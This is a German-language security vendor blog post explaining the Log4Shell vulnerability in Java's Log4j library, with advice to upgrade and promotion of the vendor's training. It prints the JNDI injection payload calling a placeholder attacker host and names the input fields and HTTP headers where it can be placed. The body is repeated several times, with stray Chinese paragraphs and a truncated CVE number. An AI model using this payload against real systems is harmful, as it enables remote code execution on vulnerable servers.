Log4j-Sicherheitslücke im Detail – Angriffsvektoren und Schutzmaßnahmen
Am 9. Dezember wurde eine Zero-Day-Sicherheitslücke in der Java-Bibliothek Log4j bekannt gegeben. CVE-44228, auch bekannt alsLog4Shell, wurde aufgrund der Möglichkeit der Remote-Code-Ausführungals„hochkritisch“ eingestuft. Da log4j-core eine der am häufigsten verwendeten Java-Logging-Bibliotheken ist, sind Millionen von Anwendungen gefährdet.
Möchten Sie Ihre Fähigkeiten im Umgang mit Log4Shell schnell verbessern?
Wir haben eine Demo-Umgebung eingerichtet, die Sie von den Grundlagen von Log4Shell bis hin zur Ausnutzung dieser Sicherheitslücke in einem Simulator namens Mission führt. In dieser Mission zeigen wir Ihnen, wie sich die Log4j-Sicherheitslücke auf Ihre Infrastruktur und Anwendungen auswirken kann. Klicken Sie hier, um direkt zur Demo-Umgebung zu gelangen, oder lesen Sie weiter, um mehr über diese Sicherheitslücke zu erfahren.
Alte Nachrichten?
Diese Schwachstelle ist nichts Neues. Sicherheitsforscher haben bereits 2016 in einer BlackHat-Präsentation von Álvaro Muñoz und Oleksandr Mirosh betont,dass „Anwendungen keine JNDI-Abfragen mit nicht vertrauenswürdigen Daten durchführen sollten”, und erklärt, wie gezielte JNDI/LDAP-Injektionen zur Remote-Code-Ausführung führen können. Genau das ist der Kern von Log4Shell.
Angriffsvektor
Die Injektionslast von Log4Shell ist wie folgt:
$ {jndi: ldap: //attacker.host/xyz}
要理解这一点,我们需要了解 Java 的表达式语言 (EL)。用以下语法编写的表达式: $ {expr} 将在运行时进行评估。例如,$ {java: version} 将返回正在使用的 Java 版本。
Als Nächstes kommt JNDI, oder Java Naming and Directory Interface, eineAPI, die es ermöglicht, Dienste über Protokolle wie LDAP, DNS, RMI usw. zu verbinden, um Daten oder Ressourcen abzurufen. Einfach ausgedrückt führt JNDI in dem oben genannten Beispiel für eine bösartige Nutzlast eine Abfrage an einem vom Angreifer kontrollierten LDAP-Server durch. Die Antwort könnte beispielsweise auf eine Java-Klassendatei verweisen, die bösartigen Code enthält, der dann auf dem anfälligen Server ausgeführt wird.
Die Schwachstelle ist deshalb so problematisch, weil Log4j alle Protokolleinträge auswertet und alle protokollierten Benutzereingaben abfragt, die mit der EL-Syntax mit dem Präfix „jndi“ geschrieben sind. Die Nutzlast kann überall dort injiziert werden, wo Benutzer Daten eingeben können, z. B. in Formularfeldern. Darüber hinaus können HTTP-Header wie User-Agent und X-Forwarded-For sowieandere Header so angepasst werden, dass sie die Nutzlast enthalten.
Um die Schwachstelle selbst zu erleben, besuchen Sie unseren Ausstellungsbereich und gehen Sie zu Schritt 2 – „Erleben Sie die Auswirkungen“.
Prävention: Bewusstsein
Es wird empfohlen, alle Anwendungen zu aktualisieren, da Log4j weiterhin an der Behebung des anfälligen Codes arbeitet. Die Versionen 2.15.0 und 2.16.0 enthalten jedoch DDoS- und andere Schwachstellen, sodass ab Ende Dezember ein Upgrade auf 2.17.0 empfohlen wird.
Bei der Entwicklung von Code müssen wir stets die Sicherheit berücksichtigen. Log4Shell hat uns gezeigt, dass die Verwendung von Frameworks oder Bibliotheken von Drittanbietern Risiken mit sich bringt. Wir müssen uns der Tatsache bewusst sein, dass die Verwendung externer Ressourcen die Sicherheit unserer Anwendungen beeinträchtigen kann, auch wenn wir naiv davon ausgehen, dass diese Ressourcen sicher sind.
Kann diese Sicherheitslücke verhindert werden? Ja und nein. Einerseits können Entwickler nur dann mehr tun, wenn anfällige Komponenten durch Software von Drittanbietern eingeführt werden. Andererseits wiederholt sich die daraus gewonnene Erkenntnis immer wieder: Man sollte niemals den Eingaben der Benutzer vertrauen.
Secure Code Warrior ist der Ansicht, dass sicherheitsbewusste Entwickler der beste Weg sind, um Code-Schwachstellen zu verhindern. Da SCW Schulungen für bestimmte Programmierframeworks in großem Umfang anbietet, können Unternehmenskunden anhand der Berichtsdaten schnell herausfinden, welche Java-Entwickler betroffen sind. Außerdem setzen sie auf von SCW geschulte Sicherheitsbeauftragte, um die Aktualisierung von Log4j zu beschleunigen.
InsbesondereSecure Code Warrior Java-EntwicklerSecure Code Warrior SenseiIntelliJ-Plugin. Dieses regelbasierte Code-Analyse-Tool kann zur Durchsetzung von Codierungsrichtlinien sowie zur Vorbeugung und Behebung von Schwachstellen eingesetzt werden. Sie können Ihre eigenen Regeln erstellen oder unsere vorgefertigten Regel-Rezepteverwenden. Stöbern Sie in unseren Rezepten und vergessen Sie nicht, unser Log4j-Rezept herunterzuladen, mit dem Sie die Log4Shell-Sicherheitslücke im Handumdrehen finden und beheben können.
Verbessern Sie Ihre Fähigkeiten zur Abwehr von Log4Shell
Möchten Sie das in diesem Blogbeitrag Gelernte in die Praxis umsetzen? Unsere Demo-Umgebung kann Ihnen dabei helfen. Zu Beginn der Demo erhalten Sie einen kurzen Überblick über diese Schwachstelle und werden anschließend in eine simulierte Umgebung weitergeleitet, in der Sie die Schwachstelle anhand von Anweisungen ausprobieren können.
Im Dezember 2021 wurde eine schwerwiegende Sicherheitslücke namens Log4Shell in der Java-Bibliothek Log4j bekannt gegeben. In diesem Artikel werden wir die Log4Shell-Sicherheitslücke auf ihre einfachste Form herunterbrechen, damit Sie die Grundlagen verstehen können, und Ihnen eine Aufgabe vorstellen – einen Spielplatz, auf dem Sie Ihr Wissen über diese Sicherheitslücke nutzen können, um zu versuchen, eine simulierte Website anzugreifen.
Secure Code Warrior kann Ihrem Unternehmen dabei helfen, Code während des gesamten Softwareentwicklungszyklus zu schützen und eine Kultur zu schaffen, in der Cybersicherheit an erster Stelle steht. Ganz gleich, ob Sie AppSec-Manager, Entwickler, Chief Information Security Officer oder in einem anderen sicherheitsrelevanten Bereich tätig sind – wir können Ihrem Unternehmen dabei helfen, die mit unsicherem Code verbundenen Risiken zu minimieren.
Demo buchen
Laura Verheyde ist Softwareentwicklerin bei Secure Code Warrior und beschäftigt sich mit der Erforschung von Schwachstellen und der Erstellung von Inhalten für Missions und Coding Labs.
Am 9. Dezember wurde eine Zero-Day-Sicherheitslücke in der Java-Bibliothek Log4j bekannt gegeben. CVE-44228, auch bekannt alsLog4Shell, wurde aufgrund der Möglichkeit der Remote-Code-Ausführungals„hochkritisch“ eingestuft. Da log4j-core eine der am häufigsten verwendeten Java-Logging-Bibliotheken ist, sind Millionen von Anwendungen gefährdet.
Möchten Sie Ihre Fähigkeiten im Umgang mit Log4Shell schnell verbessern?
Wir haben eine Demo-Umgebung eingerichtet, die Sie von den Grundlagen von Log4Shell bis hin zur Ausnutzung dieser Sicherheitslücke in einem Simulator namens Mission führt. In dieser Mission zeigen wir Ihnen, wie sich die Log4j-Sicherheitslücke auf Ihre Infrastruktur und Anwendungen auswirken kann. Klicken Sie hier, um direkt zur Demo-Umgebung zu gelangen, oder lesen Sie weiter, um mehr über diese Sicherheitslücke zu erfahren.
Alte Nachrichten?
Diese Schwachstelle ist nichts Neues. Sicherheitsforscher haben bereits 2016 in einer BlackHat-Präsentation von Álvaro Muñoz und Oleksandr Mirosh betont,dass „Anwendungen keine JNDI-Abfragen mit nicht vertrauenswürdigen Daten durchführen sollten”, und erklärt, wie gezielte JNDI/LDAP-Injektionen zur Remote-Code-Ausführung führen können. Genau das ist der Kern von Log4Shell.
Angriffsvektor
Die Injektionslast von Log4Shell ist wie folgt:
$ {jndi: ldap: //attacker.host/xyz}
要理解这一点,我们需要了解 Java 的表达式语言 (EL)。用以下语法编写的表达式: $ {expr} 将在运行时进行评估。例如,$ {java: version} 将返回正在使用的 Java 版本。
Als Nächstes kommt JNDI, oder Java Naming and Directory Interface, eineAPI, die es ermöglicht, Dienste über Protokolle wie LDAP, DNS, RMI usw. zu verbinden, um Daten oder Ressourcen abzurufen. Einfach ausgedrückt führt JNDI in dem oben genannten Beispiel für eine bösartige Nutzlast eine Abfrage an einem vom Angreifer kontrollierten LDAP-Server durch. Die Antwort könnte beispielsweise auf eine Java-Klassendatei verweisen, die bösartigen Code enthält, der dann auf dem anfälligen Server ausgeführt wird.
Die Schwachstelle ist deshalb so problematisch, weil Log4j alle Protokolleinträge auswertet und alle protokollierten Benutzereingaben abfragt, die mit der EL-Syntax mit dem Präfix „jndi“ geschrieben sind. Die Nutzlast kann überall dort injiziert werden, wo Benutzer Daten eingeben können, z. B. in Formularfeldern. Darüber hinaus können HTTP-Header wie User-Agent und X-Forwarded-For sowieandere Header so angepasst werden, dass sie die Nutzlast enthalten.
Um die Schwachstelle selbst zu erleben, besuchen Sie unseren Ausstellungsbereich und gehen Sie zu Schritt 2 – „Erleben Sie die Auswirkungen“.
Prävention: Bewusstsein
Es wird empfohlen, alle Anwendungen zu aktualisieren, da Log4j weiterhin an der Behebung des anfälligen Codes arbeitet. Die Versionen 2.15.0 und 2.16.0 enthalten jedoch DDoS- und andere Schwachstellen, sodass ab Ende Dezember ein Upgrade auf 2.17.0 empfohlen wird.
Bei der Entwicklung von Code müssen wir stets die Sicherheit berücksichtigen. Log4Shell hat uns gezeigt, dass die Verwendung von Frameworks oder Bibliotheken von Drittanbietern Risiken mit sich bringt. Wir müssen uns der Tatsache bewusst sein, dass die Verwendung externer Ressourcen die Sicherheit unserer Anwendungen beeinträchtigen kann, auch wenn wir naiv davon ausgehen, dass diese Ressourcen sicher sind.
Kann diese Sicherheitslücke verhindert werden? Ja und nein. Einerseits können Entwickler nur dann mehr tun, wenn anfällige Komponenten durch Software von Drittanbietern eingeführt werden. Andererseits wiederholt sich die daraus gewonnene Erkenntnis immer wieder: Man sollte niemals den Eingaben der Benutzer vertrauen.
Secure Code Warrior ist der Ansicht, dass sicherheitsbewusste Entwickler der beste Weg sind, um Code-Schwachstellen zu verhindern. Da SCW Schulungen für bestimmte Programmierframeworks in großem Umfang anbietet, können Unternehmenskunden anhand der Berichtsdaten schnell herausfinden, welche Java-Entwickler betroffen sind. Außerdem setzen sie auf von SCW geschulte Sicherheitsbeauftragte, um die Aktualisierung von Log4j zu beschleunigen.
InsbesondereSecure Code Warrior Java-EntwicklerSecure Code Warrior SenseiIntelliJ-Plugin. Dieses regelbasierte Code-Analyse-Tool kann zur Durchsetzung von Codierungsrichtlinien sowie zur Vorbeugung und Behebung von Schwachstellen eingesetzt werden. Sie können Ihre eigenen Regeln erstellen oder unsere vorgefertigten Regel-Rezepteverwenden. Stöbern Sie in unseren Rezepten und vergessen Sie nicht, unser Log4j-Rezept herunterzuladen, mit dem Sie die Log4Shell-Sicherheitslücke im Handumdrehen finden und beheben können.
Verbessern Sie Ihre Fähigkeiten zur Abwehr von Log4Shell
Möchten Sie das in diesem Blogbeitrag Gelernte in die Praxis umsetzen? Unsere Demo-Umgebung kann Ihnen dabei helfen. Zu Beginn der Demo erhalten Sie einen kurzen Überblick über diese Schwachstelle und werden anschließend in eine simulierte Umgebung weitergeleitet, in der Sie die Schwachstelle anhand von Anweisungen ausprobieren können.
Am 9. Dezember wurde eine Zero-Day-Sicherheitslücke in der Java-Bibliothek Log4j bekannt gegeben. CVE-44228, auch bekannt alsLog4Shell, wurde aufgrund der Möglichkeit der Remote-Code-Ausführungals„hochkritisch“ eingestuft. Da log4j-core eine der am häufigsten verwendeten Java-Logging-Bibliotheken ist, sind Millionen von Anwendungen gefährdet.
Möchten Sie Ihre Fähigkeiten im Umgang mit Log4Shell schnell verbessern?
Wir haben eine Demo-Umgebung eingerichtet, die Sie von den Grundlagen von Log4Shell bis hin zur Ausnutzung dieser Sicherheitslücke in einem Simulator namens Mission führt. In dieser Mission zeigen wir Ihnen, wie sich die Log4j-Sicherheitslücke auf Ihre Infrastruktur und Anwendungen auswirken kann. Klicken Sie hier, um direkt zur Demo-Umgebung zu gelangen, oder lesen Sie weiter, um mehr über diese Sicherheitslücke zu erfahren.
Alte Nachrichten?
Diese Schwachstelle ist nichts Neues. Sicherheitsforscher haben bereits 2016 in einer BlackHat-Präsentation von Álvaro Muñoz und Oleksandr Mirosh betont,dass „Anwendungen keine JNDI-Abfragen mit nicht vertrauenswürdigen Daten durchführen sollten”, und erklärt, wie gezielte JNDI/LDAP-Injektionen zur Remote-Code-Ausführung führen können. Genau das ist der Kern von Log4Shell.
Angriffsvektor
Die Injektionslast von Log4Shell ist wie folgt:
$ {jndi: ldap: //attacker.host/xyz}
要理解这一点,我们需要了解 Java 的表达式语言 (EL)。用以下语法编写的表达式: $ {expr} 将在运行时进行评估。例如,$ {java: version} 将返回正在使用的 Java 版本。
Als Nächstes kommt JNDI, oder Java Naming and Directory Interface, eineAPI, die es ermöglicht, Dienste über Protokolle wie LDAP, DNS, RMI usw. zu verbinden, um Daten oder Ressourcen abzurufen. Einfach ausgedrückt führt JNDI in dem oben genannten Beispiel für eine bösartige Nutzlast eine Abfrage an einem vom Angreifer kontrollierten LDAP-Server durch. Die Antwort könnte beispielsweise auf eine Java-Klassendatei verweisen, die bösartigen Code enthält, der dann auf dem anfälligen Server ausgeführt wird.
Die Schwachstelle ist deshalb so problematisch, weil Log4j alle Protokolleinträge auswertet und alle protokollierten Benutzereingaben abfragt, die mit der EL-Syntax mit dem Präfix „jndi“ geschrieben sind. Die Nutzlast kann überall dort injiziert werden, wo Benutzer Daten eingeben können, z. B. in Formularfeldern. Darüber hinaus können HTTP-Header wie User-Agent und X-Forwarded-For sowieandere Header so angepasst werden, dass sie die Nutzlast enthalten.
Um die Schwachstelle selbst zu erleben, besuchen Sie unseren Ausstellungsbereich und gehen Sie zu Schritt 2 – „Erleben Sie die Auswirkungen“.
Prävention: Bewusstsein
Es wird empfohlen, alle Anwendungen zu aktualisieren, da Log4j weiterhin an der Behebung des anfälligen Codes arbeitet. Die Versionen 2.15.0 und 2.16.0 enthalten jedoch DDoS- und andere Schwachstellen, sodass ab Ende Dezember ein Upgrade auf 2.17.0 empfohlen wird.
Bei der Entwicklung von Code müssen wir stets die Sicherheit berücksichtigen. Log4Shell hat uns gezeigt, dass die Verwendung von Frameworks oder Bibliotheken von Drittanbietern Risiken mit sich bringt. Wir müssen uns der Tatsache bewusst sein, dass die Verwendung externer Ressourcen die Sicherheit unserer Anwendungen beeinträchtigen kann, auch wenn wir naiv davon ausgehen, dass diese Ressourcen sicher sind.
Kann diese Sicherheitslücke verhindert werden? Ja und nein. Einerseits können Entwickler nur dann mehr tun, wenn anfällige Komponenten durch Software von Drittanbietern eingeführt werden. Andererseits wiederholt sich die daraus gewonnene Erkenntnis immer wieder: Man sollte niemals den Eingaben der Benutzer vertrauen.
Secure Code Warrior ist der Ansicht, dass sicherheitsbewusste Entwickler der beste Weg sind, um Code-Schwachstellen zu verhindern. Da SCW Schulungen für bestimmte Programmierframeworks in großem Umfang anbietet, können Unternehmenskunden anhand der Berichtsdaten schnell herausfinden, welche Java-Entwickler betroffen sind. Außerdem setzen sie auf von SCW geschulte Sicherheitsbeauftragte, um die Aktualisierung von Log4j zu beschleunigen.
InsbesondereSecure Code Warrior Java-EntwicklerSecure Code Warrior SenseiIntelliJ-Plugin. Dieses regelbasierte Code-Analyse-Tool kann zur Durchsetzung von Codierungsrichtlinien sowie zur Vorbeugung und Behebung von Schwachstellen eingesetzt werden. Sie können Ihre eigenen Regeln erstellen oder unsere vorgefertigten Regel-Rezepteverwenden. Stöbern Sie in unseren Rezepten und vergessen Sie nicht, unser Log4j-Rezept herunterzuladen, mit dem Sie die Log4Shell-Sicherheitslücke im Handumdrehen finden und beheben können.
Verbessern Sie Ihre Fähigkeiten zur Abwehr von Log4Shell
Möchten Sie das in diesem Blogbeitrag Gelernte in die Praxis umsetzen? Unsere Demo-Umgebung kann Ihnen dabei helfen. Zu Beginn der Demo erhalten Sie einen kurzen Überblick über diese Schwachstelle und werden anschließend in eine simulierte Umgebung weitergeleitet, in der Sie die Schwachstelle anhand von Anweisungen ausprobieren können.
Klicken Sie auf den folgenden Link und laden Sie die PDF-Datei dieser Ressource herunter.
Secure Code Warrior kann Ihrem Unternehmen dabei helfen, Code während des gesamten Softwareentwicklungszyklus zu schützen und eine Kultur zu schaffen, in der Cybersicherheit an erster Stelle steht. Ganz gleich, ob Sie AppSec-Manager, Entwickler, Chief Information Security Officer oder in einem anderen sicherheitsrelevanten Bereich tätig sind – wir können Ihrem Unternehmen dabei helfen, die mit unsicherem Code verbundenen Risiken zu minimieren.
Bericht anzeigenDemo buchen
Laura Verheyde ist Softwareentwicklerin bei Secure Code Warrior und beschäftigt sich mit der Erforschung von Schwachstellen und der Erstellung von Inhalten für Missions und Coding Labs.
Am 9. Dezember wurde eine Zero-Day-Sicherheitslücke in der Java-Bibliothek Log4j bekannt gegeben. CVE-44228, auch bekannt alsLog4Shell, wurde aufgrund der Möglichkeit der Remote-Code-Ausführungals„hochkritisch“ eingestuft. Da log4j-core eine der am häufigsten verwendeten Java-Logging-Bibliotheken ist, sind Millionen von Anwendungen gefährdet.
Möchten Sie Ihre Fähigkeiten im Umgang mit Log4Shell schnell verbessern?
Wir haben eine Demo-Umgebung eingerichtet, die Sie von den Grundlagen von Log4Shell bis hin zur Ausnutzung dieser Sicherheitslücke in einem Simulator namens Mission führt. In dieser Mission zeigen wir Ihnen, wie sich die Log4j-Sicherheitslücke auf Ihre Infrastruktur und Anwendungen auswirken kann. Klicken Sie hier, um direkt zur Demo-Umgebung zu gelangen, oder lesen Sie weiter, um mehr über diese Sicherheitslücke zu erfahren.
Alte Nachrichten?
Diese Schwachstelle ist nichts Neues. Sicherheitsforscher haben bereits 2016 in einer BlackHat-Präsentation von Álvaro Muñoz und Oleksandr Mirosh betont,dass „Anwendungen keine JNDI-Abfragen mit nicht vertrauenswürdigen Daten durchführen sollten”, und erklärt, wie gezielte JNDI/LDAP-Injektionen zur Remote-Code-Ausführung führen können. Genau das ist der Kern von Log4Shell.
Angriffsvektor
Die Injektionslast von Log4Shell ist wie folgt:
$ {jndi: ldap: //attacker.host/xyz}
要理解这一点,我们需要了解 Java 的表达式语言 (EL)。用以下语法编写的表达式: $ {expr} 将在运行时进行评估。例如,$ {java: version} 将返回正在使用的 Java 版本。
Als Nächstes kommt JNDI, oder Java Naming and Directory Interface, eineAPI, die es ermöglicht, Dienste über Protokolle wie LDAP, DNS, RMI usw. zu verbinden, um Daten oder Ressourcen abzurufen. Einfach ausgedrückt führt JNDI in dem oben genannten Beispiel für eine bösartige Nutzlast eine Abfrage an einem vom Angreifer kontrollierten LDAP-Server durch. Die Antwort könnte beispielsweise auf eine Java-Klassendatei verweisen, die bösartigen Code enthält, der dann auf dem anfälligen Server ausgeführt wird.
Die Schwachstelle ist deshalb so problematisch, weil Log4j alle Protokolleinträge auswertet und alle protokollierten Benutzereingaben abfragt, die mit der EL-Syntax mit dem Präfix „jndi“ geschrieben sind. Die Nutzlast kann überall dort injiziert werden, wo Benutzer Daten eingeben können, z. B. in Formularfeldern. Darüber hinaus können HTTP-Header wie User-Agent und X-Forwarded-For sowieandere Header so angepasst werden, dass sie die Nutzlast enthalten.
Um die Schwachstelle selbst zu erleben, besuchen Sie unseren Ausstellungsbereich und gehen Sie zu Schritt 2 – „Erleben Sie die Auswirkungen“.
Prävention: Bewusstsein
Es wird empfohlen, alle Anwendungen zu aktualisieren, da Log4j weiterhin an der Behebung des anfälligen Codes arbeitet. Die Versionen 2.15.0 und 2.16.0 enthalten jedoch DDoS- und andere Schwachstellen, sodass ab Ende Dezember ein Upgrade auf 2.17.0 empfohlen wird.
Bei der Entwicklung von Code müssen wir stets die Sicherheit berücksichtigen. Log4Shell hat uns gezeigt, dass die Verwendung von Frameworks oder Bibliotheken von Drittanbietern Risiken mit sich bringt. Wir müssen uns der Tatsache bewusst sein, dass die Verwendung externer Ressourcen die Sicherheit unserer Anwendungen beeinträchtigen kann, auch wenn wir naiv davon ausgehen, dass diese Ressourcen sicher sind.
Kann diese Sicherheitslücke verhindert werden? Ja und nein. Einerseits können Entwickler nur dann mehr tun, wenn anfällige Komponenten durch Software von Drittanbietern eingeführt werden. Andererseits wiederholt sich die daraus gewonnene Erkenntnis immer wieder: Man sollte niemals den Eingaben der Benutzer vertrauen.
Secure Code Warrior ist der Ansicht, dass sicherheitsbewusste Entwickler der beste Weg sind, um Code-Schwachstellen zu verhindern. Da SCW Schulungen für bestimmte Programmierframeworks in großem Umfang anbietet, können Unternehmenskunden anhand der Berichtsdaten schnell herausfinden, welche Java-Entwickler betroffen sind. Außerdem setzen sie auf von SCW geschulte Sicherheitsbeauftragte, um die Aktualisierung von Log4j zu beschleunigen.
InsbesondereSecure Code Warrior Java-EntwicklerSecure Code Warrior SenseiIntelliJ-Plugin. Dieses regelbasierte Code-Analyse-Tool kann zur Durchsetzung von Codierungsrichtlinien sowie zur Vorbeugung und Behebung von Schwachstellen eingesetzt werden. Sie können Ihre eigenen Regeln erstellen oder unsere vorgefertigten Regel-Rezepteverwenden. Stöbern Sie in unseren Rezepten und vergessen Sie nicht, unser Log4j-Rezept herunterzuladen, mit dem Sie die Log4Shell-Sicherheitslücke im Handumdrehen finden und beheben können.
Verbessern Sie Ihre Fähigkeiten zur Abwehr von Log4Shell
Möchten Sie das in diesem Blogbeitrag Gelernte in die Praxis umsetzen? Unsere Demo-Umgebung kann Ihnen dabei helfen. Zu Beginn der Demo erhalten Sie einen kurzen Überblick über diese Schwachstelle und werden anschließend in eine simulierte Umgebung weitergeleitet, in der Sie die Schwachstelle anhand von Anweisungen ausprobieren können.
Verzeichnis
Secure Code Warrior kann Ihrem Unternehmen dabei helfen, Code während des gesamten Softwareentwicklungszyklus zu schützen und eine Kultur zu schaffen, in der Cybersicherheit an erster Stelle steht. Ganz gleich, ob Sie AppSec-Manager, Entwickler, Chief Information Security Officer oder in einem anderen sicherheitsrelevanten Bereich tätig sind – wir können Ihrem Unternehmen dabei helfen, die mit unsicherem Code verbundenen Risiken zu minimieren.
Demo buchen下载Ressourcen, die Ihnen den Einstieg erleichtern
Themen und Inhalte der Sicherheitsschulung
Unsere branchenführenden Inhalte werden ständig weiterentwickelt, um sich an die sich wandelnde Softwareentwicklungslandschaft anzupassen und gleichzeitig Ihre Rolle zu berücksichtigen. Die Themen reichen von KI bis hin zu XQuery-Injection und sind für verschiedene Positionen geeignet, von Architekten und Ingenieuren bis hin zu Produktmanagern und QA-Mitarbeitern. Verschaffen Sie sich einen ersten Überblick nach Themen und Rollen und erfahren Sie, was unser Inhaltsverzeichnis zu bieten hat.
Die Kamer van Koophandel setzt Maßstäbe für entwicklergesteuerte Sicherheit in großem Maßstab
Die Kamer van Koophandel berichtet, wie sie sicheres Codieren durch rollenbasierte Zertifizierungen, Trust Score-Benchmarking und eine Kultur der gemeinsamen Verantwortung für Sicherheit in die tägliche Entwicklungsarbeit integriert hat.
%20(1).avif)
.avif)
Bedrohungsmodellierung mit KI: So wird jeder Entwickler zum Bedrohungsmodellierer
Sie werden besser gerüstet sein, um Entwicklern dabei zu helfen, Ideen und Techniken zur Bedrohungsmodellierung mit den KI-Tools zu kombinieren, die sie bereits verwenden, um die Sicherheit zu erhöhen, die Zusammenarbeit zu verbessern und von Anfang an widerstandsfähigere Software zu entwickeln.
Ressourcen, die Ihnen den Einstieg erleichtern
Cybermon ist zurück: Die KI-Mission zum Besiegen des Bosses ist jetzt auf Abruf verfügbar.
Cybermon 2025: Der Kampf gegen den Boss hat nun in SCW ganzjährig begonnen. Der Kampf um die Sicherheit von KI/LLM auf Stammesebene, die Entwicklung von Sicherheits-KI wird durch groß angelegte Modelle verstärkt.
Auslegung des Gesetzes zur Netzresilienz: Was bedeutet es, durch die Entwicklung von Design-Software Sicherheit zu erreichen?
Verstehen Sie die Anforderungen des EU-Gesetzes zur Netzresilienz (CRA), für wen es gilt und wie sich Ingenieurteams durch Designpraktiken, Schwachstellenprävention und Kompetenzaufbau für Entwickler darauf vorbereiten können.
Treibende Faktoren 1: Klare und messbare Erfolgskriterien
Enabler 1 ist der Auftakt zu unserer 10-teiligen Reihe über Erfolgsfaktoren. Er zeigt, wie sichere Codierung mit Geschäftsergebnissen wie Risikominderung und schnellerer Reifung langfristiger Pläne in Verbindung gebracht werden kann.
